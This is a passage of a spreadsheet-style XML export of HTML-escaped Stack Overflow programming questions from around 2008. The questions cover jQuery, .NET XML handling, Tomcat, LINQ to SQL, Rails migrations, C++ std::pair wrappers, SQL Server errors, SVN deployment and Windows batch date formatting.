&lt;pre&gt;&lt;code&gt;divstr = '&amp;lt;div&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;div&amp;gt;&amp;lt;/div&amp;gt;...&amp;lt;div&amp;gt;&amp;lt;/div&amp;gt;';
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and then injecting that into my container:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$('#container').html(divstr);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a more elegant way to insert multiple, identical elements?&lt;/p&gt;
&lt;p&gt;I'm hoping to find something that wouldn't break chaining but wouldn't bring the browser to its knees. A chainable &lt;code&gt;.repeat()&lt;/code&gt; plugin?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Identifying COM components in a .NET application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've inherited a .NET application that pulls together about 100 dlls built by two teams or purchased from vendors. I would like to quickly identify whether a given dll is a .NET assembly or a COM component. I realize that I could just invoke ildasm on each dll individually and make a note if the dll does not have a valid CLR header, but this approach seems clumsy and difficult to automate.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I un-escape XML entities easily in .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some code which returns InnerXML for a XMLNode.&lt;/p&gt;
&lt;p&gt;The node can contain just some text (with HTML) or XML.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;XMLNode&amp;gt;
    Here is some &amp;amp;lt;strong&amp;amp;gt;HTML&amp;amp;lt;/strong&amp;amp;gt;
&amp;lt;XMLNode&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;XMLNode&amp;gt;
    &amp;lt;XMLContent&amp;gt;Here is some content&amp;lt;/XMLContnet&amp;gt;
&amp;lt;/XMLNode&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;if I get the InnerXML for &lt;code&gt;&amp;lt;XmlNode&amp;gt;&lt;/code&gt; the HTML tags are returned as XML entities.&lt;/p&gt;
&lt;p&gt;I cannot use InnerText because I need to be able to get the XML contents. So all I really need is a way to un-escape the HTML tags, because I can detect if it's XML or not and act accordingly.&lt;/p&gt;
&lt;p&gt;I guess I could use HTMLDecode, but will this decode all the XML encoded entities?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; I guess I'm rambling a bit above so here is a clarified scenario:&lt;/p&gt;
&lt;p&gt;I have a XML document that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;content id="1"&amp;gt;
    &amp;lt;data&amp;gt;&amp;amp;lt;p&amp;amp;gt;A Test&amp;amp;lt;/p&amp;amp;gt;&amp;lt;/data&amp;gt;
&amp;lt;/content id="2"&amp;gt;
&amp;lt;content&amp;gt;
    &amp;lt;data&amp;gt;
        &amp;lt;dataitem&amp;gt;A test&amp;lt;/dataitem&amp;gt;
    &amp;lt;/data&amp;gt;
&amp;lt;/content&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;XmlNode xn1 = document.SelectSingleNode("/content[@id=1]/data");
XmlNode xn2 = document.SelectSingleNode("/content[@id=2]/data");
Console.WriteLine(xn1.InnerXml);
Console.WriteLine(xn2.InnerXml);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;xn1 will return &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;amp;lt;p&amp;amp;gt;A Test&amp;amp;lt;/p&amp;amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;xn2 will return &lt;code&gt;&amp;lt;dataitem&amp;gt;A test&amp;lt;/dataitem&amp;gt;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I am already checking to see if what is returned is XML (in the case of xn2) so all I need to do is un-escape the &lt;code&gt;&amp;amp;lt;&lt;/code&gt; etc in xn1.&lt;/p&gt;
&lt;p&gt;HTMLDecode does this, but I'm not sure it would work for everything. So the question remains would HTMLDecode handle all the possible entities or is there a class somewhere that will do it for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to integrate Geronimo's transaction manager in Tomcat?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does Geronimo provides a standalone transaction manager?
And if it does, is it possible to use it in Tomcat?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a named log in $TOMCAT_HOME/logs for my servlet?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently logging via the simplest of methods within my servlet using Tomcat.  I use the ServletConfig.getServletContext().log to record activity.  This writes to the localhost.YYYY-MM-DD.log in $TOMCAT_HOME/logs.&lt;/p&gt;
&lt;p&gt;I don't want to get away from the simplicity of this logging mechanism unless absolutely necessary.  But I would like to name my log file.  Rather than "localhost".YYYY-MM-DD.log, is there a way to have it write to "myAppName".YYYY-MM-DD.log.  I know I could create my own mechanism, but again, I looking for simplicity here.&lt;/p&gt;
&lt;p&gt;I'm hoping to stay away from a complete framework like Log4j.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where can I find examples of element heavy web forms?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to look at some examples of some good form layouts (web-based) that have a lot of input fields. I do a lot of web application development and a lot of my forms are input element heavy so I am always looking for good ideas on how to display my forms. For example I have a few list boxes and a lot of text boxes and some drop downs on a page along with displaying history of changes to the form.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you know of any IDEs that are localized to Spanish?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a buddy that's having a hard time with the language barrier. I tried to think of any IDEs that are also available in Spanish, but couldn't think of any. Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq to SQL: .FirstOrDefault() not applicable to select new { ... }</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just asked &lt;a href="http://stackoverflow.com/questions/201686/linq-to-sql-select-optimization"&gt;this question&lt;/a&gt;. Which lead me to a new question :)&lt;/p&gt;
&lt;p&gt;Up until this point, I have used the following pattern of selecting stuff with Linq to SQL, with the purpose of being able to handle 0 "rows" returned by the query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var person = (from p in [DataContextObject].Persons
              where p.PersonsID == 1
              select new p).FirstOrDefault();
if (person == null)
{
    // handle 0 "rows" returned.
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I can't use &lt;code&gt;FirstOrDefault()&lt;/code&gt; when I do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var person = from p in [DataContextObject].Persons
             where p.PersonsID == 1
             select new { p.PersonsID, p.PersonsAdress, p.PersonsZipcode };
// Under the hood, this pattern generates a query which selects specific
// columns which will be faster than selecting all columns as the above
// snippet of code does. This results in a performance-boost on large tables.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I check for 0 "rows" returned by the query, using the second pattern?
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;UPDATE:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I think my build fails because I am trying to assign the result of the query to a variable (&lt;code&gt;this._user&lt;/code&gt;) declared with the type of &lt;code&gt;[DataContext].User&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this._user = (from u in [DataContextObject].Users
              where u.UsersID == [Int32]
              select new { u.UsersID }).FirstOrDefault();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;em&gt;Compilation error: Cannot implicitly convert type "AnonymousType#1" to "[DataContext].User".&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Any thoughts on how I can get around this? Would I have to make my own object?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I solve "index unique_schema_migrations already exists" in Rails?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Running &lt;code&gt;rake db:migrate&lt;/code&gt; followed by &lt;code&gt;rake test:units&lt;/code&gt; yields the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;rake test:functionals
(in /projects/my_project)
rake aborted!
SQLite3::SQLException: index unique_schema_migrations already exists: CREATE UNIQUE INDEX "unique_schema_migrations" ON "ts_schema_migrations" ("version")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The relevant part of &lt;code&gt;db/schema.rb&lt;/code&gt; is as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;create_table "ts_schema_migrations", :id =&amp;gt; false, :force =&amp;gt; true do |t|
  t.string "version", :null =&amp;gt; false
end
add_index "ts_schema_migrations", ["version"], :name =&amp;gt; "unique_schema_migrations", :unique =&amp;gt; true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not manually changing this index anywhere, and I'm using Rails' default SQLite3 adapter with a brand new database.  (That is, running &lt;code&gt;rm db/*sqlite3&lt;/code&gt; before &lt;code&gt;rake db:migrate&lt;/code&gt; doesn't help.)&lt;/p&gt;
&lt;p&gt;Is the &lt;code&gt;test:units&lt;/code&gt; task perhaps trying to re-load the schema?  If so, why?  Shouldn't it recognize the schema is already up to date?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using server-side XML Parser to generate HTML content</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible using a server side XML parser to have it create an HTML blob that is then included in an existing HTML page?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>can realloc Array, then Why use pointers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This was an job placement interview I faced. They asked whether we can realloc Array, I told yes. Then They asked - then why we need pointers as most of the people give reason that it wastes memory space. I could not able to give satisfactory answer. If any body can give any satisfactory answer, I'll be obliged. Please mention any situation where the above statement can contradict.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I determine the last time any record changed in a specific Sql Server 2000 database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a SQL Server 2000 database instance that is rarely updated.  I also have a database table which has no columns holding each row's created date or modified date.  &lt;/p&gt;
&lt;p&gt;Is there any way that I can determine the last time an update or insert was performed on the database as a whole, so that I can at least put a bound on when the specific records in the table may have changed?&lt;/p&gt;
&lt;p&gt;Note:  I am looking for information about transactions that have already occurred.  Triggers may help we should I require this again in the future, but does not address the problem I'm trying to describe.&lt;/p&gt;
&lt;p&gt;If it can be done, how can I do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I set up a timer to prevent overlapping ajax calls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a page where search resuts are shown both in a grid and on a map (using KML generated on the fly, overlaid on an embedded Google map). I've wired this up to work as the user types; here's the skeleton of my code, which works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(function() {
    // Wire up search textbox
    $('input.Search').bind("keyup", update);
});
update = function(e) {
    // Get text from search box
    // Pass to web method and bind to concessions grid
    $.ajax({  
        ...
        success: function(msg) {
            displayResults(msg, filterParams);
        },
    });
}
displayResults = function(msg, filterParams) {
        // Databind results grid using jTemplates
        // Show results on map: Pass parameters to KML generator and overlay on map
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Depending on the search, there may be hundreds of results; and so the work that happens in &lt;code&gt;displayResults&lt;/code&gt; is processor-intensive both on the server (querying the database, building and simplifying the KML on the fly) and on the client (databinding the results grid, overlaying big KML files on the map). &lt;/p&gt;
&lt;p&gt;I like the immediacy of getting progressively narrower results as I type, but I'd like to minimize the number of times this refreshes. What's the simplest way to introduce an N-second delay after the user stops typing, before running the &lt;code&gt;update&lt;/code&gt; function?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Run a XNA compiled game from DVD or CD on XBOX 360?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to run a XNA game compiled for XBOX 360 from a DVD or CD, or does it have to be copied onto the HD?&lt;/p&gt;
&lt;p&gt;Is it possible to include a library which is not a part of the .net compact framework in a XBOX 360 project?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a nice way of building a wParam or lParam in C#? (Something friendlier than shift operators?)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When the WIN32 docs says something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;wParam
    The low-order word specifies the edit control identifier.
    The high-order word specifies the notification message.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What's a nice way of building that wParam?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a convenient way to wrap std::pair as a new type?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Often times I find myself using std::pair to define logical groupings of two related quantities as function arguments/return values. Some examples: row/col, tag/value, etc.&lt;/p&gt;
&lt;p&gt;Often times I should really be rolling my own class instead of just using std::pair. It's pretty easy to see when things start breaking down - when the code becomes littered with make_pair, first, and second, its very hard to remember what is what - an &lt;code&gt;std::pair&amp;lt;int, int&amp;gt;&lt;/code&gt; conveys less meaning than a type &lt;code&gt;Position&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What have you found are the best ways to wrap the functionality of std::pair in a type that conveys real meaning?&lt;/p&gt;
&lt;p&gt;Here are some things I have considered:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typedef std::pair&amp;lt;int, int&amp;gt; Position;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This at least gives the type a meaningful name when passing it around, but the type isn't enforced, its still really just a pair, and most of the same problems still exist. This is however very simple to write.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct Position : public std::pair&amp;lt;int, int&amp;gt;
{
    typedef std::pair&amp;lt;int, int&amp;gt; Base;
    Position() : Base() {}
    Position(const Position &amp;amp;x) : Base(x) {}
    Position(int a, int b) : Base(a, b) {}
    int &amp;amp;row() { return first; }
    const int &amp;amp;row() const { return first; }
    int &amp;amp;col() { return second; }
    const int &amp;amp;col() const { return second; }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is better, since we can access the variables via a reasonably descriptive name. The problem here is that you can still access first and second, so its easy for the abstraction to leak. Also, accessing simple variables via functions makes the syntax annoying.&lt;/p&gt;
&lt;p&gt;The obvious next step is to make the inheritance private:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct Position : private std::pair&amp;lt;int, int&amp;gt;
{
    typedef std::pair&amp;lt;int, int&amp;gt; Base;
    Position() {}
    Position(const Position &amp;amp;x) : Base(x) {}
    Position(int a, int b) : Base(a, b) {}
    int &amp;amp;row() { return first; }
    const int &amp;amp;row() const { return first; }
    int &amp;amp;col() { return second; }
    const int &amp;amp;col() const { return second; }
    bool operator&amp;lt;(const Position &amp;amp;x) const { return Base(*this) &amp;lt; Base(x); }
    // other forwarding operators as needed...
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So now at least we have gotten rid of the access to first and second, but now a new problem pops up. When we want to store the type in an std::set, we now don't have access to the operator&amp;lt; overload since we don't have access to first and second. This means we have to define a forwarding function for each operator overload we want. For me this is usually ==, !=, and &amp;lt;, but there could be others that I'd want. Yes I know I probably shouldn't overload operator&amp;lt; just to stick it in an associative container, but it makes everything so darn simple... And defining these operators for each new type is a pain, and we STILL have to access via functions. We can fix that:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct Position
{
    Position() {}
    Position(const Position &amp;amp;x) : row(x.row), col(x.col) {}
    Position(int row, int col) : row(row), col(col) {}
    int row, col;
};
bool operator&amp;lt;(const Position &amp;amp;a, const Position &amp;amp;b)
{
    return a.row &amp;lt; b.row || (!(b.row &amp;lt; a.row) &amp;amp;&amp;amp; a.col &amp;lt; b.col);
}
// more overloads as needed
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So now we have simple variable access, but now defining overloaded operators is even more of a pain, because instead of just forwarding them to the pair's implementation, we actually have to re-implement them each time...&lt;/p&gt;
&lt;p&gt;Are there any solutions I have overlooked that make this easy without the drawbacks? If there aren't which would you tend to prefer?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC Preview 5 on Mono</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have any information about getting the current versions of ASP.NET MVC (Preview 5) working on Mono 2.0? There was info on the old versions (Preview 2, maybe Preview 3), but I've seen no details about making Preview 5 actually work.&lt;/p&gt;
&lt;p&gt;The &lt;a href="http://www.mono-project.com/Roadmap" rel="nofollow"&gt;Mono Project Roadmap&lt;/a&gt; indicates ASP.NET 3.5 for Mono 2.4 (next year). Any ideas on how to get this useful before then?&lt;/p&gt;
&lt;p&gt;More details: The basic MVC Preview 5 template seems to work, so long as I avoid the root directory. If I request the root, I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Server Error in '/' Application
The virtual path '' maps to another application.
Description: HTTP 500. Error processing request.
Stack Trace:
System.Web.HttpException: The virtual path '' maps to another application.
  at System.Web.HttpContext.RewritePath (System.String filePath, System.String pathInfo, System.String queryString, Boolean setClientFilePath) [0x00000] 
  at System.Web.HttpContext.RewritePath (System.String path, Boolean rebaseClientPath) [0x00000] 
  at System.Web.HttpContext.RewritePath (System.String path) [0x00000] 
  at MvcApplication1._Default.Page_Load (System.Object sender, System.EventArgs e) [0x00000] 
  at System.Web.UI.Control.OnLoad (System.EventArgs e) [0x00000] 
  at System.Web.UI.Control.LoadRecursive () [0x00000] 
  at System.Web.UI.Page.ProcessLoad () [0x00000] 
  at System.Web.UI.Page.ProcessPostData () [0x00000] 
  at System.Web.UI.Page.InternalProcessRequest () [0x00000] 
  at System.Web.UI.Page.ProcessRequest (System.Web.HttpContext context) [0x00000] 
Version information: Mono Version: 2.0.50727.42; ASP.NET Version: 2.0.50727.42
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How hard is it to incorporate full text search with SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a C#/ASP.NET app with an SQL backend. I am on deadline and finishing up my pages, out of left field one of my designers incorporated a full text search on one of my pages. My "searches" up until this point have been filters, being able to narrow a result set by certain factors and column values. &lt;/p&gt;
&lt;p&gt;Being that I'm on deadline (you know 3 hours sleep a night, at the point where I am looking like something the cat ate and threw up), I was expecting this page to be very similar to be others and I'm trying to decide whether or not to make a stink. I have never done a full text search on a page before.... is this a mountain to climb or is there a simple solution?&lt;/p&gt;
&lt;p&gt;thank you. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Windows Powershell have a Try/Catch or other error handling mechanism?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a script, when a command-let or other executable statement errors out, is there a try/catch type of mechanism to recover from these errors? I haven't run across one in the documentation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling a C# web service from with PHP with a long parameter</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a customer that is trying to call our web service written in C# from PHP code. The web service call takes a long as parameter.&lt;/p&gt;
&lt;p&gt;This call works fine for other customers calling from C# or Java but this customer is getting an error back from the call. I haven't debugged their specific call but I am guessing that the 64bit integer is getting truncated somehow from PHP. The customer says they are just making the web service call with a string but is there a wrapper in PHP that does type conversion. Could this be losing the number information?&lt;/p&gt;
&lt;p&gt;Thanks for any info.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When should I write Static Methods?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So I understand what a static method or field is, I am just wondering when to use them. That is, when writing code what design lends itself to using static methods and fields. &lt;/p&gt;
&lt;p&gt;One common pattern is to use static methods as a static factory, but this could just as easily be done by overloading a constructor. Correct? For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var bmp = System.Drawing.Bitmap.LoadFromFile("Image01.jpg");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As for static fields, is creating singelton-objects their best use? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I reuse a command in bash with different parameters?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two scripts that often need to be run with the same parameter:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ populate.ksh 9241 &amp;amp;&amp;amp; check.ksh 9241
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I need to change the parameter (&lt;strong&gt;9241&lt;/strong&gt; in this example), I can go back and edit the line in history.  But since I need to change the number in two places, I sometimes make a typo.  I'd like to be able to change the parameter just once to change it in both places.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I detect a null reference in C#?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I determine if an object reference is null in C# w/o throwing an exception if it is null?&lt;/p&gt;
&lt;p&gt;i.e. If I have a class reference being passed in and I don't know if it is null or not.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What causes error 4063 - Database ...databasename... has not been opened yet</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an scheduled agent that is trying to access a database on another server.  When it runs I get an error 4063 - Database ...databasename... has not been opened yet.&lt;/p&gt;
&lt;p&gt;The servers is listed in the ACL as manager.&lt;/p&gt;
&lt;p&gt;What are some other possible causes for this errors?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Web Apps for Source Code Discussion</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any web apps that allow for source code collaboration? I'm thinking of something that could look at an SVN repo/local folder/etc. and publish the code with support for threaded discussions under each file or class. Ideally I want to find something that I could deploy/host myself, so being based in PHP would be a huge plus.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a way to set timeouts in tomcat?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can I set timeouts for JSP pages in tomcat either on a per page or server level?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a human readable programming language?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I mean, is there a coded language with human style coding?
For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Create an object called MyVar and initialize it to 10;
Take MyVar and call MyMethod() with parameters. . .
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know it's not so useful, but it can be interesting to create such a grammar.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DOCTYPE RSS &amp; HTML entities</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an &lt;strong&gt;"ldquo"&lt;/strong&gt;, &lt;strong&gt;"rdquo"&lt;/strong&gt; and several other entities under my RSS feed. Seems like if I add&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE rss [
  &amp;lt;!ENTITY % HTMLspec PUBLIC
  "-//W3C//ENTITIES Latin 1 for XHTML//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml-special.ent"&amp;gt;
  %HTMLspec;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;below the &lt;strong&gt;xml&lt;/strong&gt; tag and above the &lt;strong&gt;rss&lt;/strong&gt; tag then I'll be able to include those entities. I added but it doesn't seem to work. Does anyone knows what I missing? Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Flash AS2.0 - Increase Label's Font Size</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know this sounds like a really obvious question, but it's proving harder to figure out than I thought. I'm developing in Flash 8/ActionScript 2.0.&lt;/p&gt;
&lt;p&gt;I have a label component, and I'm dynamically assigning it text from an xml document. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;label.text = "&amp;lt;b&amp;gt;" + xml_node.firstChild + "&amp;lt;/b&amp;gt;";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This successfully changes the label's text to whatever is in that XML node, and since I enabled HTML, it makes it bold. However, I want to increase the size of the label's font, and using &lt;code&gt;&amp;lt;font&amp;gt;&lt;/code&gt; tags won't work.&lt;/p&gt;
&lt;p&gt;Am I missing something? How do I make the font larger? ActionScript is just so picky!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Unit tests framework for databases</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;IÂ´m looking for a unit tests framework for database development. IÂ´m currently developing for SQL Server 2000, 2005 and 2008.  Do you know of any good frameworks with similar functionality as JUnit and NUnit?&lt;br /&gt;
Perhaps itÂ´s better to ask, what do you use to unit test your stored procedures and user defined functions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there really no way to follow up dataset parent relation in xaml binding?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose I have a dataset with those two immortal tables: Employee &amp;amp; Order &lt;br/&gt;
&lt;strong&gt;Emp&lt;/strong&gt; -&gt; ID, Name &lt;br/&gt;
&lt;strong&gt;Ord&lt;/strong&gt; -&gt; Something, Anotherthing, EmpID &lt;br/&gt;
And relation &lt;strong&gt;Rel&lt;/strong&gt;: Ord (EmpID) -&gt; Emp (ID) &lt;br/&gt;&lt;/p&gt;
&lt;p&gt;It works great in standard master/detail scenario &lt;br/&gt;
(show employees, follow down the relation, show related orders), &lt;br/&gt;
but what when I wan't to go the opposite way (show Ord table with Emp.Name)? &lt;br/&gt;&lt;/p&gt;
&lt;p&gt;Something like this:&lt;br/&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;stackpanel&amp;gt;   // with datacontext set from code to dataset.tables["ord"]
   &amp;lt;TextBox Text="{Binding Something}"/&amp;gt;
   &amp;lt;TextBox Text="{Binding Anotherthing}"/&amp;gt;
   &amp;lt;TextBox Text="{Binding ???}"/&amp;gt; // that's my problem, how to show related Emp.Name 
&amp;lt;/stackpanel&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas? I can create value converter, but if I wan't to use dataset instance which I get from parent module it gets tricky.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to list files in Java, sorted by Date Modified?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to get a list of files in a directory, but I want to sort it such that the oldest files are first.  My solution was to call File.listFiles and just resort the list based on File.lastModified, but I was wondering if there was a better way.&lt;/p&gt;
&lt;p&gt;Edit: My current solution, as suggested, is to use an anonymous Comparator:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;File[] files = directory.listFiles();
Arrays.sort(files, new Comparator&amp;lt;File&amp;gt;(){
    public int compare(File f1, File f2)
    {
        return Long.valueOf(f1.lastModified()).compareTo(f2.lastModified());
    } });
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Anybody know why SQL Server 2005 throws "'SQLOLEDB' failed with no error message available, result code: E_FAIL(0x80004005). "?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We've got a web system running SQL Server 2005 for the back end, and ASP.Net for the front end (using .net 2.0).&lt;/p&gt;
&lt;p&gt;Every now and then, the system barfs out the error in the title: 'SQLOLEDB' failed with no error message available, result code: E_FAIL(0x80004005). &lt;/p&gt;
&lt;p&gt;The web system runs just fine 24/7, and then every now and then will toss this out on a select or some such.  I've tried re-running the exact select that throws the error, but (of course) it works fine when I do it.  And, to answer the obvious follow-up question, no we haven't done any code changes or upgrades to speak of lately.&lt;/p&gt;
&lt;p&gt;Has anyone ever run into this before?  Nosing around on google seems to only turn up situations where Access has some kind of file issue (permissions, missing data file, etc.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way of doing an SVn checkout/update on a web hosting package</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to deploy my site on my web hosting package by doing a checkout through subversion. I do not have SSH access to my hosting package, which is just a basic LAMP web hosting package, but I do know that there is an SVN client installed on the web server.&lt;/p&gt;
&lt;p&gt;I was thinking of writing some sort of script (PHP or Shell) that can do different functions. Like a checkout, update, switch to another tag etc. and that I can call externally in some sort of fashion.&lt;/p&gt;
&lt;p&gt;Any input on best practices, things to look out for and how to go about this is very much appreciated.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;UPDATE&lt;/strong&gt;: I have been using the
  following technique for the past
  couple of weeks now. I've carefully
  crafted (and well tested) a couple
  shell scripts that I can execute from
  cron through cPanel. Whenever cron has
  completed a job it will email me the
  console output of the job. this way I
  can monitor if all commands succeeded. Since I only
  do updates on the server and no
  commits, I haven't run into any
  issues concerning Subversion. Of course, in my .htaccess
  files I have created a rule that will deny
  any access to the hidden .svn folders.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>How to get current datetime on Windows command line, in a suitable format for using in a filename?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: Now that it's 2016 I'd use powershell for this unless there's a really compelling backwards-compatible reason for it, particularly because of the regional settings issue with using &lt;code&gt;date&lt;/code&gt;. See @npocmaka's &lt;a href="http://stackoverflow.com/a/19799236/8479"&gt;http://stackoverflow.com/a/19799236/8479&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;What's a Windows command line statement(s) I can use to get the current datetime in a format that I can put into a filename?&lt;/p&gt;
&lt;p&gt;I want to have a .bat file that zips up a directory into an archive with the current date and time as part of the name, for example, &lt;code&gt;Code_2008-10-14_2257.zip&lt;/code&gt;. Is there any easy way I can do this, independent of the regional settings of the machine?&lt;/p&gt;
&lt;p&gt;I don't really mind about the date format, ideally it'd be yyyy-mm-dd, but anything simple is fine.&lt;/p&gt;
&lt;p&gt;So far I've got this, which on my machine gives me &lt;code&gt;Tue_10_14_2008_230050_91&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;rem Get the datetime in a format that can go in a filename.
set _my_datetime=%date%_%time%
set _my_datetime=%_my_datetime: =_%
set _my_datetime=%_my_datetime::=%
